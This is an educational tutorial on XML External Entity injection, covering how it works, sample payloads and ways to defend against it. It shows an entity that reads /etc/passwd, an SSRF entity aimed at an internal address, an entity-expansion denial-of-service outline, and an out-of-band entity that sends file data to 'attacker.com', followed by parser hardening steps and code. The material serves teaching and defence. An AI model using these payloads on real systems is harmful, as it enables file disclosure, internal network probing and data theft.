XXE (XML External Entity Injection) Vulnerability and Protection
Description
XXE (XML External Entity Injection) is a security vulnerability targeting XML processors. When an application parses user-submitted XML data and fails to disable external entity loading, attackers can construct malicious XML entities to read server files, initiate SSRF attacks, or cause denial of service. This vulnerability commonly appears in web services, APIs, or document parsing features.
Key Points
- XML Basic Structure: XML documents can define entities (i.e., data units), for example <!ENTITY name "value">.
- External Entities: Reference external resources via the SYSTEM keyword, such as <!ENTITY ext SYSTEM "file:///etc/passwd">.
- Dangerous Operations: If the XML parser replaces external entities with actual content and returns it, it may lead to information disclosure.
Step-by-Step Analysis of Vulnerability Principle
Step 1: Normal XML Parsing Scenario
Assume a web application accepts XML input and returns parsing results:
<!-- User-submitted legitimate XML -->
<data>
<name>John</name>
</data>
After parsing, the server returns: Hello John.
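The normal flow can be sketched in Python as follows. This is a minimal illustration only: the `greet` function is a hypothetical stand-in for the application's handler, and the standard-library `xml.etree.ElementTree` parser is an assumed choice, not necessarily what a real service would use.

```python
import xml.etree.ElementTree as ET


def greet(xml_text: str) -> str:
    """Hypothetical handler: parse the submitted XML and greet the named user."""
    root = ET.fromstring(xml_text)
    # Read the text of the <name> child; fall back to an empty string if absent.
    name = root.findtext("name", default="")
    return f"Hello {name}"


LEGITIMATE_XML = "<data><name>John</name></data>"
print(greet(LEGITIMATE_XML))
```

The point to notice is that the value of `<name>` flows straight from the parsed document into the response, so anything the parser substitutes into that element is echoed back to the client.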
Step 2: Attacker Injects Malicious External Entity
The attacker submits the following XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE payload [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>
<name>&file;</name>
</data>
<!DOCTYPE> defines the document type and declares an external entity named file that points to the system file /etc/passwd. During parsing, &file; is replaced by the file content.
Step 3: Vulnerability Trigger Result
If the parser resolves external entities and the application echoes the parsed value, the response may contain the file content:
<data>
<name>root:x:0:0:root:/root:/bin/bash...</name>
</data>
Thus, the attacker steals sensitive files.
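To see what the payload from Step 2 actually tells the parser, the following sketch lists the entity declarations in a document without resolving any of them. It uses the `EntityDeclHandler` hook of Python's standard-library `xml.parsers.expat`; the helper name `list_entity_declarations` and the `ATTACK_XML` constant are illustrative assumptions.

```python
from xml.parsers import expat

# The Step 2 payload, reproduced as a string for inspection only.
ATTACK_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE payload ['
    '<!ENTITY file SYSTEM "file:///etc/passwd">'
    ']>'
    '<data><name>&file;</name></data>'
)


def list_entity_declarations(xml_text: str) -> dict:
    """Map each declared entity name to its literal value or system identifier."""
    declared = {}

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # Internal entities carry a literal value; external ones have
        # value None and a system identifier (the URI to be fetched).
        declared[name] = system_id if value is None else value

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # No external-entity handler is installed, so nothing is fetched here.
    parser.Parse(xml_text, True)
    return declared


print(list_entity_declarations(ATTACK_XML))
```

A vulnerable parser configuration goes one step further than this sketch: it opens the system identifier and splices the content in wherever `&file;` appears.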
Advanced Vulnerability Exploitation Scenarios
- Reading Remote Resources (SSRF): Make the server request internal network resources via the http:// protocol, e.g., <!ENTITY ssrf SYSTEM "http://192.168.1.1/admin">.
- Denial of Service Attack: Exhaust memory using nested entity expansion (e.g., the "Billion Laughs" attack):
<!ENTITY a "&b;&b;"> <!ENTITY b "&c;&c;"> <!ENTITY c "...">
- Data Exfiltration (OOB XXE): When responses do not directly return data, send the data to the attacker's server via DNS or HTTP requests. In practice these declarations are usually served from an external DTD controlled by the attacker, because the XML specification does not allow parameter-entity references inside markup declarations in the internal subset:
<!ENTITY % payload SYSTEM "file:///secret.txt"> <!ENTITY % oob "<!ENTITY exfiltrate SYSTEM 'http://attacker.com/?data=%payload;'>">
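The growth behind the "Billion Laughs" attack is simple arithmetic: if every entity references the next one `fan_out` times, the expanded text multiplies by `fan_out` at each level. The sketch below computes that size; the function name and parameters are illustrative assumptions, not part of any library.

```python
def expanded_length(base_length: int, fan_out: int, levels: int) -> int:
    """Length of the fully expanded top-level entity.

    base_length: characters in the innermost entity's literal value
    fan_out:     how many times each entity references the next one
    levels:      number of entities layered above the innermost one
    """
    return base_length * fan_out ** levels


# The three-entity example from the list: c is "..." (3 characters),
# b holds two copies of c, and a holds two copies of b.
print(expanded_length(base_length=3, fan_out=2, levels=2))

# The classic variant: a 3-character string, ten references per level,
# nine levels above it.
print(expanded_length(base_length=3, fan_out=10, levels=9))
```

With the classic parameters the result is 3,000,000,000 characters, produced from a document well under a kilobyte in size, which is why parsers need limits on entity expansion.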
Protective Measures
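- Disable External Entities:
  - PHP: libxml_disable_entity_loader(true); (deprecated since PHP 8.0, where the required libxml 2.9.0 or later already disables external entity loading by default). Also avoid passing the LIBXML_NOENT flag, which turns entity substitution on.
  - Java: Set XMLConstants.FEATURE_SECURE_PROCESSING on SAXParserFactory. Where DTDs are not needed, also set the http://apache.org/xml/features/disallow-doctype-decl feature to true, since secure processing alone may not block external entities in every parser implementation.
- Use Secure Parsers: Such as Python's defusedxml library, which automatically protects against XXE.
- Input Filtering: Validate XML structure using whitelists, or use safer data formats like JSON.
- Principle of Least Privilege: The account running the XML parser should have no access to sensitive files.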
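One strict way to apply the first measure is to refuse any document that carries a DOCTYPE at all, since every entity declaration lives inside one. The sketch below does this with Python's standard library only. The names `parse_untrusted` and `DoctypeForbidden` are hypothetical, and the approach is an illustration under the assumption that the application never needs DTDs; a maintained library such as defusedxml is usually the better choice in production.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when submitted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it sees "<!DOCTYPE"; abort immediately.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted(xml_text: str) -> ET.Element:
    """Parse XML from an untrusted source, rejecting any DTD."""
    # First pass: scan the document and stop on any DOCTYPE declaration.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(xml_text, True)
    # Second pass: build the tree only for input known to be DTD-free.
    return ET.fromstring(xml_text)


SAFE_XML = "<data><name>John</name></data>"
MALICIOUS_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE payload [<!ENTITY file SYSTEM "file:///etc/passwd">]>'
    '<data><name>&file;</name></data>'
)

print(parse_untrusted(SAFE_XML).findtext("name"))
try:
    parse_untrusted(MALICIOUS_XML)
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

Rejecting the DOCTYPE outright blocks file disclosure, SSRF, and entity-expansion payloads with a single check, at the cost of refusing legitimate documents that rely on a DTD.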
Summary
XXE vulnerabilities stem from improper XML parser configuration. Effective protection can be achieved by strictly controlling external entity loading, updating dependency libraries, and standardizing data formats.